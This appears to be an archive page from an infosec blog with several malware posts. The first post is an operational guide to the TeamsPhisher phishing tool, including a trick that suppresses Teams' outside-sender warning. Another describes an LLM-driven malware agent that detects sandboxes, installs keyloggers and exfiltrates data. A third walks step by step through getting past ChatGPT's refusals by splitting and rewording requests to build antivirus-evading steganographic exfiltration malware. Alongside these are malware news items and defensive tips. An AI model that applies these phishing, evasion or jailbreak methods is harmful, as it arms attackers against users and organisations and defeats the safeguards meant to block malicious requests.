Sep 22 2023

HOW TO SEND PHISHING OR MALWARE TO TEAMS USERS EVADING TEAMS SECURITY FEATURES

Category: Malware,Phishingdisc7 @ 9:25 am

TeamsPhisher is a Python3 software that was designed to make it easier for phishing messages and attachments to be sent to users of Microsoft Teams whose companies or organizations permit connection with outside parties. It is not feasible to transfer files to users of Teams who are not part of one’s company in most circumstances. Recently, Max Corbridge (@CorbridgeMax) and Tom Ellson (@tde_sec) from JUMPSEC published a means to circumvent this limitation by modifying HTTP requests made by Teams in order to change who is sent a message with an attached file.

TeamsPhisher utilizes a number of other techniques, including some of Andrea Santese’s (@Medu554) older ones, in addition to this one.For the authentication component of the attack flow as well as other basic utility functions, it relies significantly on TeamsEnum, a brilliant piece of work that was developed by Bastian Kanbach (@bka) of SSE.

TeamsPhisher’s goal is to include the most useful aspects of the aforementioned projects in order to provide a method that is robust, fully adaptable, and highly effective for authorized Red Team operations to use Microsoft Teams for phishing in access-related circumstances.

You will need to provide TeamsPhisher with an attachment, a message, and a list of people to target. After that, it will go over the list of targets while simultaneously uploading the attachment to the sender’s Sharepoint.

First, TeamsPhisher will enumerate the target user and check to see whether that person really exists and is able to receive messages from the outside world. After that, it will initiate a new conversation with the person you choose. Note that this is technically a “group” conversation since TeamsPhisher contains the target’s email address twice; this is a clever hack from @Medu554 that will circumvent the “Someone outside your organization messaged you, are you sure you want to view it” splash screen that might offer our targets a reason to stop and think twice about viewing the message.

The user who was identified will get the message that was sent to them along with a link to the attachment that was stored in Sharepoint after a new thread has been established between our sender and the target.

After this first message has been sent, the newly established thread will be visible in the sender’s Teams GUI and may be engaged with manually, if necessary, on a case-by-case basis. Users of TeamsPhisher are required to have a Microsoft Business account (as opposed to a personal one such as @hotmail, @outlook, etc.) that is licensed for both Teams and Sharepoint in order to utilize the software.

This indicates that you will require an AAD tenant as well as at least one user who has a license that corresponds to it. At the time of publishing, the AAD licensing center does have some free trial licenses available for download that are capable of meeting all of the prerequisites for using this product.

Before you may utilize the account with TeamsPhisher, you will have to ensure that you have at least once successfully logged into the personal Sharepoint site of the user with whom you will be exchanging messages. This should be something along the lines of tenantname-my.sharepoint.com/personal/myusername_mytenantname_onmicrosoft.com or tenantname-my.sharepoint.com/personal/myusername_mytenantname_mycustomdomain_tld. Alternatively, you could also use tenantname-my.sharepoint.com/personal/myusername_mytenantname_onmicrosoft.com.

In terms of the needs of the local community, We strongly advise upgrading to the most recent version of Python3. You will also require the authentication library developed by Microsoft:

To upload the file to a Sharepoint site, you will need to manually give the site’s name. This would most likely be required in the event if the sender’s tenant makes use of a unique domain name (for example, one that does not adhere to the xxx.onmicrosoft.com norm). Just the singular name should be used; for instance, if your SharePoint site is located at mytest.sharepoint.com, you should use the –sharepoint mytest option.

Replace TeamPhisher’s standard greeting (“Hi,”) with a personalized greeting that will be appended to the message that is supplied by the –message option. For instance, “Good afternoon,” or “Sales team,” are examples.

By default, the Sharepoint link that is provided to targets may be accessed by anybody who has the link; to restrict access to the Sharepoint file so that it can only be viewed by the target who got it, use the –securelink option. It’s possible that this will help shield your virus from the blue team.

TeamsPhisher will make an effort to determine the first name of each person it is targeting and will use that name in the welcome it sends to them. For instance, tom.jones@targettenant.onmicrosoft.com would get an email with the greeting “Hi Tom, ” as the first line of the message. This is not ideal and is dependant on the format of the emails that are being targeted; use the –preview option to see whether or not this is a suitable match for the list of emails that you are targeting.

The preview version of TeamsPhisher will be executed. This will NOT send any messages to the target users; instead, the “friendly” name that would be used by the –personalize option will be shown. In addition, a sample message that is indicative of what targets would receive with the current settings will be delivered to the sender’s Teams. You may log in to check how your message appears and make any required adjustments to it.

You may choose to have a delay of x seconds between each message sent to targets. Can be of assistance with rate-limiting concerns that may arise.

TeamsPhisher will determine which accounts are unable to receive messages from third-party organizations, which accounts do not exist, and which accounts have subscription plans that are incompatible with the attack vectors.

TeamsPhisher now enables login with sender accounts using multifactor authentication (MFA), thanks to code contributed by the TeamsEnum project.

If you use the –securelink flag, the recipients of the message will see a popup asking them to verify themselves before they can view the attachment in Sharepoint. You have the ability to determine if this adds an excessive number of additional steps or whether it adds ‘legitimacy’ by sending them via the actual Microsoft login feature.

Mitigation
By changing the choices associated with external access, which can be found in the Microsoft Teams admin center under Users > External access, companies may reduce the risk that is provided by the vulnerability that has been discovered.

Organizations are provided with the freedom to pick the optimal rights to match their requirements by Microsoft, including the ability to whitelist just particular external tenants for communications and a global block that prevents any communications from occurring.

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: EVADING TEAMS SECURITY FEATURES



Jul 14 2023

THIS FREE UEFI MALWARE CODE CAN HACK WINDOWS MACHINE FOREVER, EVEN IF HARD DISK IS REMOVED

Category: Malware,Windows Securitydisc7 @ 12:29 pm

The Blacklotus bootkit was developed expressly for Windows, and it first appeared on hacker forums in October of the previous year. It was described as having APT-level capabilities, including the ability to circumvent secure boot and user access control (UAC), as well as the capacity to deactivate security software and defensive mechanisms on victim computers. Threat actors of various skill levels were able to purchase BlackLotus when it was first offered for sale on hacker forums for as little as $5,000, giving them access to malware that is often associated with state-sponsored hacking operations. However, the threat actor concealed the source code and charged clients $200 for rebuilds if they wished to modify the bootkit in any way.c
Microsoft published a set of resources in April that are intended to assist threat hunters in recognizing BlackLotus infections. The National Security Agency (NSA) released some guidelines in June to assist firms in strengthening their defenses against the threat.


Although it has a number of alterations in comparison to the malware’s initial form, the BlackLotus UEFI bootkit’s original source code has been made available to the public on GitHub.

The ‘Baton Drop’ exploit that targets CVE-2022-21894 has been removed from the BlackLotus source code that was released on GitHub on Wednesday. Additionally, the BlackLotus source code now employs the bootlicker UEFI firmware rootkit, although it still retains the majority of the original code.

The fact that the bootkit’s source code is available to the public poses a considerable danger, primarily because it may be paired with newly discovered vulnerabilities to open up previously undiscovered entry points for attacks. BlackLotus was able to utilize the attack despite the fact that CVE-2022-21894 had been fixed the previous year. This was possible because the vulnerable binaries had not been put to the UEFI revocation list. This demonstrates how even vulnerabilities that have been patched may still present long-term, industry-wide supply chain impact.

However, since the source code was leaked, it is now very easy for threat actors to combine the bootkit with new bootloader vulnerabilities, whether they are known or undiscovered. The methods used by the bootkit are no longer cutting edge.

Be careful to adhere to the extensive mitigation guidance that the NSA issued a month ago in order to protect your computers against the BlackLotus UEFI bootkit attack.

Because the source code of the bootkit is now freely accessible, it is feasible that skilled malware writers may design more powerful variations that are able to circumvent both currently available countermeasures and those that will be developed in the future.

How to Hack Like a Legend: Breaking Windows

CISSP training course

InfoSec tools | InfoSec services | InfoSec books

Tags: HACK WINDOWS MACHINE


Jun 15 2023

LLM meets Malware: Starting the Era of Autonomous Threat

Category: Malwaredisc7 @ 2:19 am

Malware researchers analyzed the application of Large Language Models (LLM) to malware automation investigating future abuse in autonomous threats.

Executive Summary

In this report we shared some insight that emerged during our exploratory research, and proof of concept, on the application of Large Language Models to malware automation, investigating how a potential new kind of autonomous threats would look like in the near future.

  • We explored a potential architecture of an autonomous malware threat based on four main steps: an AI-empowered reconnaissances, reasoning and planning phase, and the AI-assisted execution.
  • We demonstrate the feasibility of using LLM to recognize infected environments and decide which kind of malicious actions could be best suited for the environment.
  • We adopted an iterative code generation approach to leverage LLMs in the complicated task of generating code on the fly to achieve the malicious objectives of the malware agent.
  • Luckily, current general purpose LLM models still have limitations: while incredibly competent, they still need precise instruction to achieve the best results.
  • This new kind of threat has the potential to become extremely dangerous in the future, when computational requirements of LLMs would be low enough to run the agent completely locally, and also with the usage of specific models instead of general purpose ones.

Introduction

Large Language Models started shaping the digital world around us, since the public launch of OpenAI’s ChatGPT everybody spotted a glimpse of a new era where the Large Language Models (LLMs) would profoundly impact multiple sectors soon.

The cyber security industry is not an exception, rather it could be one of the most fertile grounds for such technologies, both for good and also for bad. Researchers in the industry have just scratched the surface of this application, for instance with read teaming application, as in the case of the PentestGPT project, but also, more recently even with malware related applications, in fact, Juniper researchers were using ChatGPT to generate malicious code to demonstrate the speedup in malware writing, and CyberArk’s ones tried to use ChatGPT to realize a polymorphic malware, along with Hays researchers which created another polymorphic AI-powered malware in Python.

Following this trail of this research, we decided to experiment with LLMs in a slightly different manner: our objective was to see if such technology could lead even to a paradigm-shift in the way we see malware and attackers. To do so, we prototyped a sort of “malicious agent” completely written in Powershell, that would be able not only to generate evasive polymorphic code, but also to take some degree of decision based on the context and its “intents”.

Technical Analysis

This is an uncommon threat research article, here the focus is not in a real-world threat actor, instead we deepen an approach that could be likely adopted in the near future by a whole new class of malicious actors, the AI-powered autonomous threat.

A model for Autonomous Threats

First of all we are going to describe a general architecture that could be adopted for such an objective. An architecture which inevitably has common ground with Task-Driven Autonomous Agents like babyAGI or autoGPT. But for the sake of our experimentation, we decided to shape the logic flow of the malicious agent to better match common malware operations.

As anticipated before, our Proof of Concept (PoC) autonomous malware is an AI-enabled Powershell script, designed to illustrate the potential of artificial intelligence in automation and decision-making, with each phase of execution highlighting the adaptability and intelligence of the AI.

Breaking down the state diagram, at high level, the agent runs into the following stages.

Footprinting

During the discovery phase, the AI conducts a comprehensive analysis of the system. Its goal is to create a thorough profile of the operating environment. It examines system properties such as the operating system, installed applications, network setups, and other pertinent information.

This thorough assessment is not just for ensuring the system is ready to go, but also assists the AI in figuring out if it’s working within a controlled environment, whether it’s interacting with a server or a client. One of the crucial determinations it makes is whether it is functioning within a sandboxed environment. Sandboxes are controlled settings, often used for testing or monitoring potentially harmful activities. If the AI detects it is operating within a sandbox, it halts all execution, avoiding unnecessary exposure in a non-targeted environment.

This system data becomes a vital input that lets the malicious-AI make informed decisions and respond appropriately. It provides a comprehensive understanding of its operating environment, similar to a detailed map, allowing it to navigate the system effectively. In this sense, this phase readies the “malicious agent” for the activities that follow.

Reasoning

In the execution phase, the malicious agent maneuvers rely significantly on the context, built on a detailed understanding of the system environment gathered in the earlier analysis phase.

An intriguing aspect of this phase is the AI’s strategic decision-making, which closely emulates strategies used by well-known hacking groups. At the outset, the “malicious agent” mimics a specific, recognized hacking group. The selection of the group isn’t random but is determined by the particular context and conditions of the system.

After deciding which hacking group to mimic, the autonomous agent goes on to devise a comprehensive attack strategy. This strategy is custom-made to the specific system environment and the standard practices of the selected hacking group, for example, it may decide to include password stealing tasks in case it detects the Outlook application rather than install a backdoor account on the server.

Execution

Once the attack strategy is in place, the malicious agent begins to carry out each action in a step-by-step manner. For each action, the AI dynamically creates the necessary code and promptly puts it into action. This could include a broad range of operations, such as attempting privilege escalation, conducting password hunts, or establishing persistence.

However, the AI’s role isn’t just limited to implementation. It consistently keeps an eye on how the system responds to its actions and stays ready for unexpected occurrences. This attentiveness allows the AI to adapt and modify its actions in real time, showcasing its ability for resilience and strategic problem-solving within a changing system environment.

When guided by more specific prompts, AI proves to be exceptionally capable, even to the point of generating functional infostealers on the fly.

This AI-empowered PoC epitomizes the potential of AI in carrying out intricate tasks independently and adjusting to its environment.

Code Generation

One of the fundamental characteristics that set autonomous threats apart is their ability to generate code. Unlike traditional threats, which often require manual control or pre-programmed scripts to adapt and evolve, autonomous threats use AI algorithms to autonomously generate new code segments. This dynamic code generation ability not only allows them to adapt to changing system conditions and defenses but also makes their detection and analysis more challenging.

This process involves the use of specific prompts, allowing the AI to create custom solutions that suit the system’s unique conditions. The AI also takes an active role in monitoring the outcomes of its actions. It continually assesses the results of its code execution. If it detects errors or unsuccessful actions, it uses them as inputs for further processing. By feeding error data back into its processes, the AI can refine and optimize its code generation. This iterative process represents a significant step towards true autonomous problem-solving capabilities, as the AI dynamically adjusts its actions based on their results.

Figure. Iterative code generation and adjustment

Environment Awareness

Autonomous threats take threat intelligence to a new level by being aware of their operating environment. Traditional threats often have a one-size-fits-all approach, attacking systems without fully understanding the environment. In contrast, autonomous threats can actively monitor their environment and adapt their actions accordingly.

The concept of environmental awareness is pivotal in AI-powered cyber threats. This environmental understanding enables the autonomous malware to choose an appropriate course of action based on the context around. For example, it might identify if it’s operating within a sandbox environment or decide to behave differently based on whether it’s operating on a server or client machine.

This awareness also influences the AI’s decision-making process during its operation. It can adjust its behavior according to the context, impersonating a particular known hacker group or choosing a specific attack strategy based on the evaluated system characteristics.

This environment-aware approach could enable malware writers to rely on very sophisticated, and harder to counter, evasion schemes.

Figure. Prompt to evaluate the machine environment

Decision-Making Autonomy

Perhaps the most defining characteristic of autonomous malware is the decision-making autonomy. Unlike traditional threats that rely on pre-programmed behaviors or external control from a human operator, autonomous threats can make independent decisions about their actions.

These threats use advanced AI algorithms to analyze the available information, weigh the potential outcomes of different actions, and choose the most effective course of action. This decision-making process could involve choosing which systems to target, selecting the best method for attack, deciding when to lay dormant to avoid detection, and even determining when to delete themselves to avoid traceability.

This level of autonomy not only makes these threats more resilient to countermeasures, but it also allows them to carry out more complex and coordinated attacks. By making independent decisions, these threats can adapt to changing circumstances, carry out long-term infiltration strategies, and even coordinate with other autonomous threats to achieve their objectives.

Proof of Concept

https://youtube.com/watch?v=W-7Vk3nqVRU%3Ffeature%3Doembed

In this proof of concept (PoC), we launched our AI-enabled script on a Windows client. The script’s execution process is designed to illustrate the potential of AI in automating complex tasks, decision making, and adjusting to the environment.

Firstly, the script initiates with an exhaustive system footprinting. During this phase, the AI takes a thorough survey of the system. The focus is on creating a detailed footprint of the operating environment by examining properties such as the operating system, installed software and other relevant details. This rigorous assessment not only prepares the system for the following actions but also helps the AI understand the context it’s operating within.

Simultaneously, a crucial part of this initial phase is sandbox detection. In fact, if the AI identifies the environment as a sandbox, the execution halts immediately.

Once the AI has confirmed it’s not within a sandbox, and it’s dealing with a client, it proceeds to develop an infostealer — a type of malware that’s designed to gather and extract sensitive information from the system. In this specific case, the AI installs a keylogger to monitor and record keystrokes, providing a reliable method to capture user inputs, including passwords.

Alongside keylogging, during the test sessions, the AI performed password hunting too.

Finally, after gathering all the necessary data, the AI proceeded to the data exfiltration. The AI prepares all the accumulated data for extraction, ensuring it’s formatted and secured in a way that it can be efficiently and safely retrieved from the system.

The demonstration video provides a real-time view of these actions carried out by the AI.

This PoC underlines how an AI system can perform complex tasks, adapt to its environment, and carry out activities that previously required advanced knowledge and manual interaction.

Consideration on Experimentation Session

In all the experiments conducted, a key theme that emerged was the level of exactness needed when assigning tasks to the AI. When presented with vague or wide-ranging tasks, the AI’s output frequently lacked effectiveness and specificity. This highlights an essential trait of AI at its current stage: while incredibly competent, it still needs precise instruction to achieve the best results.

For instance, when tasked to create a generic malicious script, the AI might generate code that tries to cover a wide spectrum of harmful activities. The outcome could be a piece of code that is wide-ranging and inefficient, potentially even drawing unwanted scrutiny due to its excessive system activity.

On the other hand, when given more narrowly defined tasks, the AI demonstrated the capability to create specific components of malware. By steering the AI through smaller, more exact tasks, we could create malicious scripts that were more focused and effective. Each component could be custom-made to carry out its task with a high level of effectiveness, leading to the creation of a cohesive, efficient malware when combined.

This discovery suggests a more efficient method of utilizing AI in cybersecurity — breaking down complex tasks into smaller, manageable objectives. This modular approach allows for the creation of specific code pieces that carry out designated functions effectively and can be assembled into a larger whole.

Conclusion

In conclusion, when we just look in the direction of LLMs and malware combined together, we clearly see a significant evolution in cybersecurity threats, potentially able to lead to a paradigm shift where malicious code operates based on predefined high-level intents.

Their ability to generate code, understand their environment, and make autonomous decisions makes them a formidable challenge for future cybersecurity defenses. However, by understanding these characteristics, we can start to develop effective strategies and technologies to counter these emerging threats.

Luckily, the autonomous malware PoC we set up and the potential upcoming ones have still limitations: they rely on generic language models hosted online, this mean the internet connectivity is, and will be, a requirement for at least some time. But, we are likely going to see the adoption of local LLM models, maybe even special-purpose ones, directly embedded in the future malicious agents.

AI technology is in a rapid-development stage, and even if it is pretty young, its adoption across various sectors is widening, including in the criminal underground.

About the author: B42 Labs researchers

Original post at https://medium.com/@b42labs/llm-meets-malware-starting-the-era-of-autonomous-threat-e8c5827ccc85

Transformers for Natural Language Processing: Build, train, and fine-tune deep neural network architectures for NLP with Python, Hugging Face, and OpenAI’s GPT-3, ChatGPT, and GPT-4

LLM meets Malware: Starting the Era of Autonomous Threat

InfoSec tools | InfoSec services | InfoSec books

Tags: LLM


May 11 2023

Millions of mobile phones come pre-infected with malware, say researchers

Category: Information Security,Malware,Mobile Securitydisc7 @ 12:03 pm

The threat is coming from inside the supply chain

BLACK HAT ASIA Threat groups have infected millions of Androids worldwide with malicious firmware before the devices have even been shipped from their manufacturers, according to Trend Micro researchers at Black Hat Asia.

The mainly mobile devices, but also smartwatches, TVs and more, have their manufacturing outsourced to an original equipment manufacturer (OEM), a process the researchers say makes them easily infiltrated.

“What is the easiest way to infect millions of devices?” posed senior threat researcher Fyodor Yarochkin, speaking alongside colleague Zhengyu Dong.

He compared infiltrating devices at such an early stage of their life cycle to a tree absorbing liquid: you put the infection at the root, and it gets distributed everywhere, out to every single limb and leaf.

The malware installation technique began as the price of mobile phone firmware dropped. Competition between firmware distributors became so furious that eventually the providers could not charge money for their product.

“But of course there’s no free stuff,” said Yarochkin, who explained that the firmware started to come with an undesirable feature – silent plugins. The team manually analyzed dozens of firmware images looking for malicious software. They found over 80 different plugins, although many of those were not widely distributed.

The plugins that were the most impactful were those that had built a business model around them and were selling underground services, marketing them out in the open on places like Facebook, in blog posts, and on YouTube.

    The objective of the malware is to steal info or make money from information collected or delivered.

    The malware turns the devices into proxies which are used to steal and sell SMS messages, social media and online messaging accounts, and used as monetization opportunities via adverts and click fraud.

    One type of plugin, proxy plugins, allow the criminal to rent out devices for up to around five minutes at a time. For example, those renting the control of the device could acquire data on keystrokes, geographical location, IP address and more.

    “The user of the proxy will be able to use someone else’s phone for a period of 1200 seconds as an exit node,” said Yarochkin. He also said the team found a Facebook cookie plugin that was used to harvest activity from the Facebook app.

    Through telemetry data, the researchers estimated that at least millions of infected devices exist globally, but are centralized in Southeast Asia and Eastern Europe. A statistic self-reported by the criminals themselves, said the researchers, was around 8.9 million.

    As for where the threats are coming from, the duo wouldn’t say specifically, although the word “China” showed up multiple times in the presentation, including in an origin story related to the development of the dodgy firmware. Yarochkin said the audience should consider where most of the world’s OEMs are located and make their own deductions.

    “Even though we possibly might know the people who build the infrastructure for this business, its difficult to pinpoint how exactly the this infection gets put into this mobile phone because we don’t know for sure at what moment it got into the supply chain,“ said Yarochkin.

    The team confirmed the malware was found in the phones of at least 10 different vendors, but that there was possibly around 40 more affected. For those seeking to avoid infected mobile phones, they could go some way of protecting themselves by going high end.

    “Big brands like Samsung, like Google took care of their supply chain security relatively well, but for threat actors, this is still a very lucrative market,” said Yarochkin. ®

    https://www.theregister.com/2023/05/11/bh_asia_mobile_phones/

    #Pegasus: How a Spy in Your Pocket Threatens the End of Privacy, Dignity, and Democracy

     InfoSec tools | InfoSec services | InfoSec books

    Tags: Mobile phone security, Pegasus


    Apr 30 2023

    JUST FOR $1000 PER MONTH HACK MACOS COMPUTERS WITH THIS UNDETECTABLE MALWARE

    Category: Hacking,MalwareDISC @ 1:14 pm

    A new piece of malware known as Atomic macOS Stealer (AMOS) was recently discovered by researchers as it was being offered for sale on Telegram. The threat actor who is promoting it charges $1,000 each month and continually updates the virus that they are selling. The Atomic macOS Stealer is capable of stealing a variety of information from the computer of the victim, such as passwords saved in the Keychain, comprehensive system information, files from the victim’s desktop and documents folder, and even the macOS password itself.

    One of its many capabilities is the extraction of data from web browsers and cryptocurrency wallets such as Atomic, Binance, Coinomi, Electrum, and Exodus. This is only one of its many functions. When a threat actor purchases the stealer from the creators of the stealer, they are also given a web panel that is pre-configured and ready to use for managing the victims.

    In the event that AMOS is installed, it has the potential to compromise a broad range of data, some of which include the passwords for iCloud Keychain, the password for the macOS system, cookies, passwords, and credit card credentials from browsers like as Chrome, Firefox, Brave, Edge, and Opera, among others. Additionally, it has the ability to compromise cryptocurrency wallets such as Atomic, Binance, Exodus, Electrum, MetaMask, and a great number of others.

    A web panel, a program called Brute MetaMask, logs in Telegram with alerts, and more features are provided to customers by the malicious party that is offering malware as a service.

    The following is the message that the threat actor posted on Telegram while trying to sell the malware:

    After the malware has gained access to a user’s information, it places the information into a ZIP file, compresses it, and then sends it to the malicious party via a command and control server URL.

    It is imperative that users only download and install software from trusted sources, enable two-factor authentication, review app permissions, and refrain from opening suspicious links received via email or SMS messages as a result of this development, which is another sign that macOS is increasingly becoming a lucrative target beyond nation-state hacking groups to deploy stealer malware. The development is also a sign that macOS is becoming a target for cybercriminals to deploy stealer malware.

    To protect against it:

    Only applications from the official Apple App Store should be downloaded and installed on your device.
    Install an antivirus and internet security software package that has a good reputation on your computer.
    Make sure to use secure passwords, and implement multi-factor authentication whenever it’s possible.
    When it is feasible to do so, enable the biometric security capabilities of the device, such as fingerprint or face recognition, so that it can be unlocked.
    Always use caution before clicking on any links that are delivered to you in emails.
    When enabling any permissions, exercise extreme caution.
    Make that all of your software, including operating systems and apps, is up to date.

    The Art of Mac Malware: The Guide to Analyzing Malicious Software

    InfoSec Threats | InfoSec books | InfoSec tools | InfoSec services

    Tags: Mac Malware, MACOS COMPUTERS


    Apr 24 2023

    Preventing Malware & Cyber Attacks: Simple Tips for Your Computer

    Category: Cyber Attack,MalwareDISC @ 8:15 am

    Living without the Internet is hardly imaginable today. However, the anonymity of the internet has led to the flourishing of cyber attacks and malware. Malicious software can cause damage to our devices, steal personal data, and lead to monetary loss. Therefore, protecting your computer from these threats is crucial. This article will outline some methods and resources for protecting your devices from malicious software, and explain why it’s essential to use malware removal at all times.

    Tip #1: Keep Your Operating System and Software Up to Date

    One of the most crucial things you can do to keep your computer secure is to keep your operating system and software up to date. Security patches are frequently released by software developers to address flaws that hackers could exploit. Failing to update your system and software leaves your computer vulnerable to potential threats.

    To ensure that your operating system and software are up to date, it’s important to turn on automatic updates. This will ensure that your system gets updates as soon as they become available. Additionally, you can manually check for updates by accessing the settings for your software or operating system. By doing this, you can be certain that your computer is protected against potential threats.

    Tip #2: Use Antivirus and Anti-Malware Software

    Antivirus and malware removal software are essential tools for protecting your computer against malicious software such as viruses, spyware, and ransomware. These programs scan your computer on a regular basis for malware and remove it if found. By using antivirus and anti-malware software, you can safeguard your computer from malicious attacks and maintain its security.

    When it comes to antivirus and anti-malware software, it’s crucial to choose a reputable and trustworthy option that offers comprehensive protection against various types of malware. With numerous software options available on the market, selecting the right one can be overwhelming. However, by doing some research and selecting the one that meets your needs, you can ensure that your computer remains protected from potential threats.

    Tip #3: Use a Firewall

    firewall is a crucial security system that monitors and controls network traffic, both incoming and outgoing. It serves as a barrier between your computer and the internet, blocking unauthorized access. By utilizing a firewall, you can protect your computer from potential cyber attacks and enhance its security.

    Most operating systems come with a built-in firewall that you can enable by going to your system’s settings. However, you can further increase your computer’s security by installing a third-party firewall. These firewalls offer additional features and customization options that can help you tailor the protection to your needs. By using a firewall, you can safeguard your computer against potential threats and enhance its overall security.

    Tip #4: Use Strong and Unique Passwords

    Using strong and unique passwords is crucial in safeguarding your device against potential cyber attacks. Cybercriminals frequently use automated programs to guess passwords and weak passwords are easily guessed, allowing them to gain access to your computer more easily. By using strong and unique passwords, you can significantly enhance your computer’s security.

    To create a strong password, use a combination of letters, numbers, and symbols. Avoid using common phrases or words that are easily guessed. Additionally, do not use the same password for multiple accounts, as this can leave you vulnerable if one account is compromised. Consider using a password manager to generate and store strong and unique passwords for all your accounts. By taking these steps, you can ensure that your computer remains protected against potential threats.

    Tip #5: Be Wary of Phishing Scams

    Phishing scams are a type of social engineering attack that cybercriminals use to trick people into disclosing sensitive information like passwords and credit card numbers. These scams can be sent via email, text messages, or even social media. Falling prey to a phishing scam can lead to significant financial loss and compromise your personal information.

    To avoid falling victim to phishing scams, it’s important to be cautious of any suspicious emails or messages. Do not click on any unknown links or download any attachments from suspicious sources. Always check the sender’s email address to ensure that it is from a legitimate source.

    If you receive an email that appears to be from your bank or another financial institution, do not provide any sensitive information. Instead, contact the institution directly to confirm the authenticity of the email. By taking these steps, you can protect yourself from phishing scams and keep your personal information secure.

    Tip #6: Use Two-Factor Authentication

    Two-factor authentication (2FA) is a crucial security measure that adds an extra layer of protection to your online accounts. This security measure requires users to provide two forms of identification before accessing their accounts, making it more difficult for cybercriminals to access your information. Two-factor authentication can prevent unauthorized access to your accounts and protect your sensitive information from being compromised.

    Many online services, such as email and social media platforms, offer two-factor authentication as an additional security measure. To enable two-factor authentication, go to your account settings and follow the instructions provided by the service. You can usually choose between receiving a code via text message or using an authentication app. Enabling two-factor authentication can greatly improve the security of your accounts and help keep your personal information safe.

    Tip #7: Back Up Your Data Regularly

    The best practice to protect your data from cyber attacks is to regularly back it up. If your computer is infected with malware or hacked, you might lose all your data. By backing up your data regularly, you can easily restore your data in the event of a cyber attack.

    In conclusion, adhering to the tips and tools mentioned above can not only safeguard your personal or business data but also prevent potential embarrassment and costly fines.
    Use anti-virus and anti-malware software.

    The Cybersecurity Playbook for Modern Enterprises: An end-to-end guide to preventing data breaches and cyber attacks


    InfoSec Threats
     | InfoSec books | InfoSec tools | InfoSec services


    InfoSec Threats
     | InfoSec books | InfoSec tools | InfoSec services

    Tags: cyber attacks, data breaches, Malware


    Apr 09 2023

    Malware types and analysis

    Category: Information Security,MalwareDISC @ 9:48 am

    Accelerated Windows Malware Analysis with Memory Dumps: Training Course Transcript and WinDbg Practice Exercises, (Windows Internals Supplements)

    Malware analysis reports – Reports and IoCs from the NCSC malware analysis team

    InfoSec Threats | InfoSec books | InfoSec tools | InfoSec services

    Tags: Malware, Malware Analysis, windows malware


    Apr 05 2023

    HOW TO CREATE UNDETECTABLE MALWARE VIA CHATGPT IN 7 EASY STEPS BYPASSING ITS RESTRICTIONS

    Category: AI,ChatGPT,MalwareDISC @ 9:35 am

    There is evidence that ChatGPT has helped low-skill hackers generate malware, which raises worries about the technology being abused by cybercriminals. ChatGPT cannot yet replace expert threat actors, but security researchers claim there is evidence that it can assist low-skill hackers create malware.

    Since the introduction of ChatGPT in November, the OpenAI chatbot has assisted over 100 million users, or around 13 million people each day, in the process of generating text, music, poetry, tales, and plays in response to specific requests. In addition to that, it may provide answers to exam questions and even build code for software.

    It appears that malicious intent follows strong technology, particularly when such technology is accessible to the general people. There is evidence on the dark web that individuals have used ChatGPT for the development of dangerous material despite the anti-abuse constraints that were supposed to prevent illegitimate requests. This was something that experts feared would happen. Because of thisexperts from forcepoint came to the conclusion that it would be best for them not to create any code at all and instead rely on only the most cutting-edge methods, such as steganography, which were previously exclusively used by nation-state adversaries.

    The demonstration of the following two points was the overarching goal of this exercise:

    1. How simple it is to get around the inadequate barriers that ChatGPT has installed.
    2. How simple it is to create sophisticated malware without having to write any code and relying simply on ChatGPT

    Initially ChatGPT informed him that malware creation is immoral and refused to provide code.

    1. To avoid this, he generated small codes and manually assembled the executable.  The first successful task was to produce code that looked for a local PNG greater than 5MB. The design choice was that a 5MB PNG could readily hold a piece of a business-sensitive PDF or DOCX.

     2. Then asked ChatGPT to add some code that will encode the found png with steganography and would exfiltrate these files from computer, he asked ChatGPT for code that searches the User’s Documents, Desktop, and AppData directories then uploads them to google drive.

    3. Then he asked ChatGPT to combine these pices of code and modify it to to divide files into many “chunks” for quiet exfiltration using steganography.

    4. Then he submitted the MVP to VirusTotal and five vendors marked the file as malicious out of sixty nine.

    5. This next step was to ask ChatGPT to create its own LSB Steganography method in my program without using the external library. And to postpone the effective start by two minutes.https://www.securitynewspaper.com/2023/01/20/this-new-android-malware-allows-to-hack-spy-on-any-android-phone/embed/#?secret=nN5212UQrX#?secret=8AnjYiGI6e

    6. The another change he asked ChatGPT to make was to obfuscate the code which was rejected. Once ChatGPT rejected hisrequest, he tried again. By altering his request from obfuscating the code to converting all variables to random English first and last names, ChatGPT cheerfully cooperated. As an extra test, he disguised the request to obfuscate to protect the code’s intellectual property. Again, it supplied sample code that obscured variable names and recommended Go modules to construct completely obfuscated code.

    7. In next step he uploaded the file to virus total to check

    And there we have it; the Zero Day has finally arrived. They were able to construct a very sophisticated attack in a matter of hours by only following the suggestions that were provided by ChatGPT. This required no coding on our part. We would guess that it would take a team of five to ten malware developers a few weeks to do the same amount of work without the assistance of an AI-based chatbot, particularly if they wanted to avoid detection from all detection-based suppliers.

    ChatGPT for Startups

    InfoSec Threats | InfoSec books | InfoSec tools | InfoSec services

    Tags: ChatGPT malware


    Mar 28 2023

    What is Malware and how to prevent it

    Category: MalwareDISC @ 10:15 am
    How to recognize and remove malware

    What is Malware and how to prevent it

    Malware comes in many forms: the unwanted programs can surface as pathogensspies, or remote controls in computers. Whether it’s a virus, spyware, or a Trojan horse, this harmful software should be kept well away from your computer. What are the different types of malware? We show you how to protect yourself from them and what steps to take if your computer or webspace are affected.

    1. What exactly is malware and what are the different types?
    2. Who is affected by malware and how do you recognize an attack?
    3. Preventative measures against malware
    4. Use internet applications wisely
    5. How to remove spyware, Trojans, viruses, etc.
    6. Malware on websites
    7. Never underestimate the dangers of malicious software

    Source:

    https://www.ionos.com/digitalguide/server/security/how-to-recognize-and-remove-malware/

    InfoSec Threats | InfoSec books | InfoSec tools | InfoSec services

    Tags: Malware prevention


    Feb 27 2023

    Researchers Share New Insights Into RIG Exploit Kit Malware’s Operations

    Category: MalwareDISC @ 1:09 pm
    RIG Exploit Kit

    The RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal.

    “RIG EK is a financially-motivated program that has been active since 2014,” Swiss cybersecurity company PRODAFT said in an exhaustive report shared with The Hacker News.

    “Although it has yet to substantially change its exploits in its more recent activity, the type and version of the malware they distribute constantly change. The frequency of updating samples ranges from weekly to daily updates.”

    Exploit kits are programs used to distribute malware to large numbers of victims by taking advantage of known security flaws in commonly-used software such as web browsers.

    The fact that RIG EK runs as a service model means threat actors can financially compensate the RIG EK administrator for installing malware of their choice on victim machines. The RIG EK operators primarily employ malvertising to ensure a high infection rate and large-scale coverage.

